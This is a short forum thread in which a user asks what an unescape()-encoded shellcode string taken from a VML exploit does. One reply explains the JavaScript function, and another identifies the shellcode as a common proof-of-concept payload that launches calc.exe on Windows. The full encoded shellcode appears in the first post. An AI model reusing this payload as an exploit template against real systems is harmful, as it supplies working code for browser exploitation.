Sign in to follow this  
Followers 0
scriptkiddy

unescape shellcode

4 posts in this topic

shellcode =

unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");

what does this shell code do...

plz help

0

Share this post


Link to post
Share on other sites

It just deobfuscates some text.

The unescape() function decodes a string encoded with escape().

http://www.w3schools.com/jsref/jsref_unescape.asp

Run it and the text should appear! :P

:borg:

Thanks for your reply... but I was not looking for what the unescape () function does... I was looking for what the shell code does... I found this on the latest VML exploit... I wanted to know what that shell code is doing to the system...

0

Share this post


Link to post
Share on other sites

the shellcode is identical to the one used on http://www.jaascois.com/news/54600096/ (code for launching "calc.exe" on Windows systems) except on the end your shellcode has %u0063 and theirs has %u7865%u0065

this probally is just how they clean up after themselves and is a small part of the code that is diffrent, but it does the same.

the shellcode you posted is used in a hell of alot of PoC vulns on google, and is most likely just to start calc.exe.

0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0